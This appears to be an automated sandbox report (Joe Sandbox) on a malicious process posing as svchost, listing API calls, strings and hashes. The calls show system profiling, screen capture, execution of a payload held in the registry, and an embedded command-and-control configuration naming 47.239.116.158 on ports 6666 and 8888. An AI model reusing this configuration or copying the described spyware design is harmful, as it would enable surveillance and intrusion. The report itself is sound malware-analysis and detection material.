                                                                                                              execution_graph 47537 170000 GetPEB 47538 17002f 47537->47538 47539 170156 LoadLibraryA 47538->47539 47541 170163 VirtualAlloc 47538->47541 47546 17022a 47539->47546 47542 17018f VirtualAlloc 47541->47542 47542->47539 47544 1702f1 47545 17033a 888 API calls 47545->47546 47546->47544 47546->47545 47547 25832d0 6 API calls

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4df5430-4df54b7 call 4dff757 call 4e067c0 * 3 gethostname gethostbyname 9 4df54bd-4df5504 inet_ntoa call 4e0041d * 2 0->9 10 4df555c-4df569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 4df74e0 GetSystemInfo wsprintfW call 4df6ca0 call 4df6f30 GetForegroundWindow 0->10 9->10 20 4df5506-4df5508 9->20 23 4df569f-4df56ac GetWindowTextW 10->23 24 4df56b2-4df56c0 10->24 22 4df5510-4df555a inet_ntoa call 4e0041d * 2 20->22 22->10 23->24 26 4df56cc-4df56f0 lstrlenW call 4df6dc0 24->26 27 4df56c2 24->27 33 4df5702-4df5726 call 4dff8c6 26->33 34 4df56f2-4df56ff call 4dff8c6 26->34 27->26 39 4df5728 33->39 40 4df5732-4df5756 lstrlenW call 4df6dc0 33->40 34->33 39->40 43 4df5768-4df57b9 GetModuleHandleW GetProcAddress 40->43 44 4df5758-4df5765 call 4dff8c6 40->44 46 4df57bb-4df57c4 GetNativeSystemInfo 43->46 47 4df57c6-4df57cd GetSystemInfo 43->47 44->43 49 4df57d3-4df57e1 46->49 47->49 50 4df57ed-4df57f2 49->50 51 4df57e3-4df57eb 49->51 53 4df57f9-4df5820 wsprintfW call 4df6ac0 GetCurrentProcessId 50->53 51->50 52 4df57f4 51->52 52->53 56 4df5885-4df588c call 4df66e0 53->56 57 4df5822-4df583c OpenProcess 53->57 65 4df589e-4df58ab 56->65 66 4df588e-4df589c 56->66 57->56 58 4df583e-4df5853 K32GetProcessImageFileNameW 57->58 60 4df585e-4df5866 call 4df8140 58->60 61 4df5855-4df585c 58->61 67 4df586b-4df586d 60->67 63 4df587f CloseHandle 61->63 63->56 68 4df58ac-4df59e9 call 4dff8c6 call 4df64e0 call 4df61a0 call 4dffc5e GetTickCount call 4e0048a call 4e003f6 wsprintfW * 3 GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 4df586f-4df5876 67->69 70 4df5878-4df587e 67->70 83 4df59eb-4df5a10 68->83 84 4df5a12-4df5a31 68->84 69->63 70->63 85 4df5a32-4df5a57 call 4df5a80 call 4df3160 83->85 84->85 88 4df5a59-4df5a76 call 4dff04f call 4dff05a 85->88
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • _memset.LIBCMT ref: 04DF546C
                                                                                                              • _memset.LIBCMT ref: 04DF5485
                                                                                                              • _memset.LIBCMT ref: 04DF5495
                                                                                                              • gethostname.WS2_32(?,00000032), ref: 04DF54A3
                                                                                                              • gethostbyname.WS2_32(?), ref: 04DF54AD
                                                                                                              • inet_ntoa.WS2_32 ref: 04DF54C5
                                                                                                              • _strcat_s.LIBCMT ref: 04DF54D8
                                                                                                              • _strcat_s.LIBCMT ref: 04DF54F1
                                                                                                              • inet_ntoa.WS2_32 ref: 04DF551A
                                                                                                              • _strcat_s.LIBCMT ref: 04DF552D
                                                                                                              • _strcat_s.LIBCMT ref: 04DF5546
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5573
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5587
                                                                                                              • GetLastInputInfo.USER32(?), ref: 04DF559A
                                                                                                              • GetTickCount.KERNEL32 ref: 04DF55A0
                                                                                                              • wsprintfW.USER32 ref: 04DF55D5
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 04DF55E8
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 04DF55FC
                                                                                                              • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5653
                                                                                                              • wsprintfW.USER32 ref: 04DF566C
                                                                                                              • GetForegroundWindow.USER32 ref: 04DF5695
                                                                                                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 04DF56AC
                                                                                                              • lstrlenW.KERNEL32(000008CC), ref: 04DF56D3
                                                                                                              • lstrlenW.KERNEL32(00000994), ref: 04DF5739
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 04DF57AA
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04DF57B1
                                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 04DF57C2
                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 04DF57CD
                                                                                                              • wsprintfW.USER32 ref: 04DF5806
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04DF5818
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04DF582E
                                                                                                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 04DF584B
                                                                                                              • CloseHandle.KERNEL32(04E16164), ref: 04DF587F
                                                                                                              • GetTickCount.KERNEL32 ref: 04DF58E9
                                                                                                              • __time64.LIBCMT ref: 04DF58F8
                                                                                                              • __localtime64.LIBCMT ref: 04DF592F
                                                                                                              • wsprintfW.USER32 ref: 04DF5969
                                                                                                              • wsprintfW.USER32 ref: 04DF5981
                                                                                                                • Part of subcall function 04DF8140: GetLogicalDriveStringsW.KERNELBASE(000003E8,?,75A773E0,00000B9C,00000000), ref: 04DF8182
                                                                                                                • Part of subcall function 04DF8140: lstrcmpiW.KERNEL32(?,A:\), ref: 04DF81B6
                                                                                                                • Part of subcall function 04DF8140: lstrcmpiW.KERNEL32(?,B:\), ref: 04DF81C6
                                                                                                                • Part of subcall function 04DF8140: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DF81F6
                                                                                                                • Part of subcall function 04DF8140: lstrlenW.KERNEL32(?), ref: 04DF8207
                                                                                                                • Part of subcall function 04DF8140: __wcsnicmp.LIBCMT ref: 04DF821E
                                                                                                                • Part of subcall function 04DF8140: lstrcpyW.KERNEL32(00000B9C,?), ref: 04DF8254
                                                                                                              • wsprintfW.USER32 ref: 04DF59B0
                                                                                                              • GetLocaleInfoW.KERNELBASE(00000800,00000002,0000100E,00000040), ref: 04DF59C5
                                                                                                              • GetSystemDirectoryW.KERNEL32(0000124C,00000032), ref: 04DF59D4
                                                                                                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DF59E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$Info$ByteCharMultiSystemWide_strcat_s$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                              • String ID: %d min$%d.%d.%d %d:%d:%d$1.0$2024. 9.23$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                              • API String ID: 2154145408-4261108655
                                                                                                              • Opcode ID: 6b79268b05b80b2cc7818e3cbae9eb511a1113cc7530efde2d6f708091108f45
                                                                                                              • Instruction ID: 4c9f26012a53c2c5df428f897b8f5e98ccdc149ffea6efa08b8005cd6fa19f61
                                                                                                              • Opcode Fuzzy Hash: 6b79268b05b80b2cc7818e3cbae9eb511a1113cc7530efde2d6f708091108f45
                                                                                                              • Instruction Fuzzy Hash: 4F02B4B1A40204ABE724DF64DC81FEAB7B8EF44704F008659E71EA7181EB74BA45CF65

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 94 4dfdf60-4dfdfc2 call 4e00590 Sleep 97 4dfdfe7-4dfdfed 94->97 98 4dfdfc4-4dfdfe1 call 4dff757 call 4dffa79 CloseHandle 94->98 100 4dfdfef call 4df7670 97->100 101 4dfdff4-4dfe069 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 4dffa79 CloseHandle call 4dff757 97->101 98->97 100->101 110 4dfe06b-4dfe076 call 4df2c90 101->110 111 4dfe078 101->111 113 4dfe07c-4dfe096 call 4dff757 110->113 111->113 117 4dfe098-4dfe099 call 4df9780 113->117 118 4dfe0a4 113->118 121 4dfe09e-4dfe0a2 117->121 120 4dfe0a8 118->120 122 4dfe0b3-4dfe0bf call 4dfce50 120->122 121->120 125 4dfe109-4dfe14a call 4dff8c6 * 2 122->125 126 4dfe0c1-4dfe107 call 4dff8c6 * 2 122->126 135 4dfe150-4dfe160 125->135 126->135 136 4dfe1a2-4dfe1aa 135->136 137 4dfe162-4dfe19c call 4dfce50 call 4dff8c6 * 2 135->137 138 4dfe1ac-4dfe1ae 136->138 139 4dfe1b2-4dfe1b9 136->139 137->136 138->139 141 4dfe1bb-4dfe1c5 139->141 142 4dfe1c7-4dfe1cb 139->142 144 4dfe1d1-4dfe1d7 141->144 142->144 146 4dfe1d9-4dfe1f3 EnumWindows 144->146 147 4dfe216-4dfe23e call 4e00590 call 4df2da0 144->147 146->147 149 4dfe1f5-4dfe214 Sleep EnumWindows 146->149 155 4dfe250-4dfe2fc call 4e00590 CreateEventA call 4dff8c6 call 4dfcac0 147->155 156 4dfe240-4dfe24b Sleep 147->156 149->147 149->149 164 4dfe307-4dfe30d 155->164 165 4dfe30f-4dfe343 Sleep RegOpenKeyExW 164->165 166 4dfe368-4dfe37c call 4df5430 164->166 167 4dfe345-4dfe35b RegQueryValueExW 165->167 168 4dfe361-4dfe366 165->168 170 4dfe381-4dfe387 166->170 167->168 168->164 168->166 171 4dfe3ba-4dfe3c0 170->171 172 4dfe389-4dfe3b5 CloseHandle 170->172 173 4dfe3c2-4dfe3de call 4dffa79 171->173 174 4dfe3e0 171->174 172->122 177 4dfe3e4 173->177 174->177 179 4dfe3e6-4dfe3ed 177->179 180 4dfe3ef-4dfe3fe Sleep 179->180 181 4dfe45d-4dfe470 179->181 180->179 182 4dfe400-4dfe407 180->182 185 4dfe482-4dfe4bc call 4e00590 Sleep CloseHandle 181->185 186 4dfe472-4dfe47c WaitForSingleObject CloseHandle 181->186 182->181 184 4dfe409-4dfe41b 182->184 190 4dfe42d-4dfe458 Sleep CloseHandle 184->190 191 4dfe41d-4dfe427 WaitForSingleObject CloseHandle 184->191 185->122 186->185 190->122 191->190
                                                                                                              APIs
                                                                                                                • Part of subcall function 04E00590: __fassign.LIBCMT ref: 04E00586
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 04DFDFB4
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04DFDFE1
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 04DFDFF9
                                                                                                              • wsprintfW.USER32 ref: 04DFE030
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(04DF7600), ref: 04DFE03E
                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 04DFE057
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • EnumWindows.USER32(04DF5D10,?), ref: 04DFE1ED
                                                                                                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DFE1FA
                                                                                                              • EnumWindows.USER32(04DF5D10,?), ref: 04DFE20E
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 04DFE245
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04DFE291
                                                                                                              • Sleep.KERNELBASE(00000FA0), ref: 04DFE314
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DFE33B
                                                                                                              • RegQueryValueExW.KERNELBASE(?,IpDatespecial,00000000,?,00000000,?), ref: 04DFE35B
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE3AD
                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DFE3F4
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DFE420
                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 04DFE427
                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DFE432
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE450
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DFE475
                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 04DFE47C
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 04DFE496
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE4B4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$47.239.116.158$47.239.116.158$47.239.116.158$6666$6666$8888$Console$IpDatespecial
                                                                                                              • API String ID: 1511462596-3870480628
                                                                                                              • Opcode ID: 25bf09fec3e0205da2507ad5026ca02c762b31200c9a8ed2dd4d4c452721aa24
                                                                                                              • Instruction ID: a7253b6c908472b74c38265fb3790f0413c5042cdd5df681cbc6b12c5516b137
                                                                                                              • Opcode Fuzzy Hash: 25bf09fec3e0205da2507ad5026ca02c762b31200c9a8ed2dd4d4c452721aa24
                                                                                                              • Instruction Fuzzy Hash: 7AD125B1684340AFE330DF65DD84E2AB7E4FBC4706F050A1DFA55832A0DB75A904CB62

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 193 4dfbcc0-4dfbd33 GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 194 4dfbd46-4dfbd4e GetSystemMetrics 193->194 195 4dfbd35-4dfbd41 193->195 197 4dfbd9b-4dfbdb9 call 4e11220 GetSystemMetrics call 4e11220 194->197 198 4dfbd50-4dfbd99 call 4e11220 GetSystemMetrics call 4e11220 194->198 196 4dfbdc6-4dfbf4f GetSystemMetrics call 4e11220 GetSystemMetrics call 4e11220 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics call 4e11220 GetSystemMetrics call 4e11220 StretchBlt call 4dff044 call 4e067c0 GetDIBits call 4dff044 call 4e067c0 call 4e076b0 call 4dff757 195->196 227 4dfbf51-4dfbf5e 196->227 228 4dfbf60-4dfbf66 call 4dfc0b0 196->228 209 4dfbdbe-4dfbdc3 197->209 198->209 209->196 227->228 230 4dfbf6b-4dfbf6d 228->230 231 4dfbf6f-4dfbf9a DeleteObject * 2 ReleaseDC call 4dffb19 230->231 232 4dfbfe9-4dfc013 call 4dff044 230->232 237 4dfbf9c-4dfbfa2 call 4dffb19 231->237 238 4dfbfa5-4dfbfa7 231->238 239 4dfc019 232->239 240 4dfc015-4dfc017 232->240 237->238 243 4dfbfa9-4dfbfad 238->243 244 4dfbfd4-4dfbfe6 call 4dff05a 238->244 242 4dfc01b-4dfc056 call 4e076b0 DeleteObject * 2 ReleaseDC call 4dffb19 239->242 240->242 258 4dfc058-4dfc05e call 4dffb19 242->258 259 4dfc061-4dfc065 242->259 248 4dfbfaf-4dfbfb7 call 4dff04f 243->248 249 4dfbfba-4dfbfd1 call 4dff04f 243->249 248->249 249->244 258->259 260 4dfc067-4dfc06f call 4dff04f 259->260 261 4dfc072-4dfc09f call 4dff04f call 4dff05a 259->261 260->261
                                                                                                              APIs
                                                                                                              • GetDesktopWindow.USER32 ref: 04DFBCDF
                                                                                                              • GetDC.USER32(00000000), ref: 04DFBCEC
                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04DFBCF2
                                                                                                              • GetDC.USER32(00000000), ref: 04DFBCFD
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 04DFBD0A
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 04DFBD12
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 04DFBD23
                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 04DFBD48
                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04DFBD76
                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 04DFBDC8
                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 04DFBDDD
                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 04DFBDF6
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 04DFBE04
                                                                                                              • SetStretchBltMode.GDI32(?,00000003), ref: 04DFBE10
                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04DFBE1D
                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 04DFBE30
                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 04DFBE57
                                                                                                              • _memset.LIBCMT ref: 04DFBECA
                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 04DFBEE7
                                                                                                              • _memset.LIBCMT ref: 04DFBEFF
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFBF73
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFBF7D
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 04DFBF89
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFC02F
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFC039
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 04DFC045
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                              • API String ID: 3293817703-713438465
                                                                                                              • Opcode ID: 05d8cabd0bbdaf5b561e41980b04b71d5c8679f2764cefdb7f423ee3f5ac643d
                                                                                                              • Instruction ID: 344ed3b7084ca98d438ab9fb604fffc069923ca0dfa02087764118fe6df8f348
                                                                                                              • Opcode Fuzzy Hash: 05d8cabd0bbdaf5b561e41980b04b71d5c8679f2764cefdb7f423ee3f5ac643d
                                                                                                              • Instruction Fuzzy Hash: 4FD171B1E00308AFEB14DFE5EC85B9EBBB9FF48300F154529EA05A7250D774A945CB61
                                                                                                              APIs
                                                                                                              • GetDriveTypeW.KERNELBASE(?,7591DF80,00000000,75A773E0), ref: 04DF6CDB
                                                                                                              • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,?), ref: 04DF6CFA
                                                                                                              • _memset.LIBCMT ref: 04DF6D31
                                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?), ref: 04DF6D44
                                                                                                              • swprintf.LIBCMT ref: 04DF6D89
                                                                                                              • swprintf.LIBCMT ref: 04DF6D9C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                              • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                              • API String ID: 3202570353-3501811827
                                                                                                              • Opcode ID: 8851af1f95f01beb8cf13b3f1d1075b4b8bf1a116779a84fc9374c7c50f4b4d5
                                                                                                              • Instruction ID: 0ee35d192943dd0baf4c85cc9457379e3204de6bf27635143feaadb1131256d8
                                                                                                              • Opcode Fuzzy Hash: 8851af1f95f01beb8cf13b3f1d1075b4b8bf1a116779a84fc9374c7c50f4b4d5
                                                                                                              • Instruction Fuzzy Hash: 48315EB2E4020C9BDB14CFE5DC45FEEB7B9FB88700F50421DE91AA7240E6746905CBA0
APIs
• CreateDXGIFactory.DXGI(04E167CC,?,E179827C,7591DF80,00000000,75A773E0), ref: 04DF6F9A
• swprintf.LIBCMT ref: 04DF716E
• std::_Xinvalid_argument.LIBCPMT ref: 04DF7217
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: CreateFactoryXinvalid_argumentstd::_swprintf
• String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
• API String ID: 3803070356-257307503
• Opcode ID: 37df94d1e9c12edbf74021f903af3f776e9d6c21a012fa39016a52f3bb4763b3
• Instruction ID: 3834060b8968794ba67494cd25855557f8c72e671a367daa24351cc8543c51e6
• Opcode Fuzzy Hash: 37df94d1e9c12edbf74021f903af3f776e9d6c21a012fa39016a52f3bb4763b3
• Instruction Fuzzy Hash: 12E16371B001259FDF34DE64CC80BEEB3B5FF89304F1545A9EA4AA7284D771AE818B91

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00170178
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001701B0
• LoadLibraryA.KERNELBASE(?,?,Ws2_), ref: 00170216
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340160722.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_170000_svchost.jbxd
Similarity
• API ID: AllocVirtual$LibraryLoad
• String ID: 32.d$Ws2_$ll$ntdl
• API String ID: 2441068224-255390435
• Opcode ID: fdccc19db2408593c1fdb8b1f75a9a0650cdb8db1fe8c02b4a48aaef36251bd2
• Instruction ID: defcb698330b0e51a5f1acfd1ac7bbc21bc4dfc51e4d021bcffc4f095d87d6a9
• Opcode Fuzzy Hash: fdccc19db2408593c1fdb8b1f75a9a0650cdb8db1fe8c02b4a48aaef36251bd2
• Instruction Fuzzy Hash: FD9188B1908380EFD7269F60C886A2ABBF1FF8C354F15895DF99C86262D771D8009F12

APIs
• CoInitialize.OLE32(00000000), ref: 04DF66EB
• CoCreateInstance.OLE32(04E156FC,00000000,00000001,04E1571C,?,?,?,?,?,?,?,?,?,?,04DF588A), ref: 04DF6702
• SysFreeString.OLEAUT32(?), ref: 04DF679C
• CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,04DF588A), ref: 04DF67CD
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: CreateFreeInitializeInstanceStringUninitialize
• String ID: FriendlyName
• API String ID: 841178590-3623505368
• Opcode ID: 731df211c71b2810eaadcc257331965c2f51b86b06b32bdbcae2d6b6b9720a03
• Instruction ID: 6ee9742d5e32d119ca222c252ecf5f80bdf420dd524caffaf935dd0943b1dafb
• Opcode Fuzzy Hash: 731df211c71b2810eaadcc257331965c2f51b86b06b32bdbcae2d6b6b9720a03
• Instruction Fuzzy Hash: 05312C79740605AFDB10DB99CC81EAEB7B9EFC8704F148598FA04EB254DA71ED02CB60

APIs
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: Time_memmovetime
• String ID:
• API String ID: 1463837790-0
• Opcode ID: b56811716f620937b51e75a6e963b8b6a174ec3a5bce733030ea545f108af4a9
• Instruction ID: 9c378a59209fa107d289d069f60ed661bcd9f2869c537612e40ccfbe1bbed611
• Opcode Fuzzy Hash: b56811716f620937b51e75a6e963b8b6a174ec3a5bce733030ea545f108af4a9
• Instruction Fuzzy Hash: 9B512872700602AFD711EF69C8C4A6ABBA6FF8471471486ACD80AEB710DB70FC41CB94

Control-flow Graph
APIs
• _memset.LIBCMT ref: 02585E61
  • Part of subcall function 02585D60: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D78
  • Part of subcall function 02585D60: _memset.LIBCMT ref: 02585D82
  • Part of subcall function 02585D60: lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D8F
  • Part of subcall function 02585D60: lstrlenW.KERNEL32(?,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D97
• RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0258600B
• RegQueryValueExW.KERNELBASE(?,IpDate,00000000,00000003,00000000,00000000), ref: 02586030
• _memset.LIBCMT ref: 02586048
• RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,0000000A), ref: 02586068
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: _memsetlstrlen$QueryValue$Open
• String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
• API String ID: 3278200350-210159355
• Opcode ID: 517a17ef7ad74314883f9a9fdabb10b097f54492b5afbe68e9ee746f02b33489
• Instruction ID: 51247770edaeb5d53f878856a5bc0a7a7e574245720b1da9dd329e8d704c82a1
• Opcode Fuzzy Hash: 517a17ef7ad74314883f9a9fdabb10b097f54492b5afbe68e9ee746f02b33489
• Instruction Fuzzy Hash: 685197B5BD230A7AFD3072A48C0BF5DAB957B59F06FD90043BA07391C179D0360949AE

Control-flow Graph
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Console\0,00000000,00020019,?), ref: 02585507
• RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 0258552E
• _memset.LIBCMT ref: 02585548
• RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02585563
• VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02585586
• RegCloseKey.ADVAPI32(?), ref: 025855B1
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 02585605
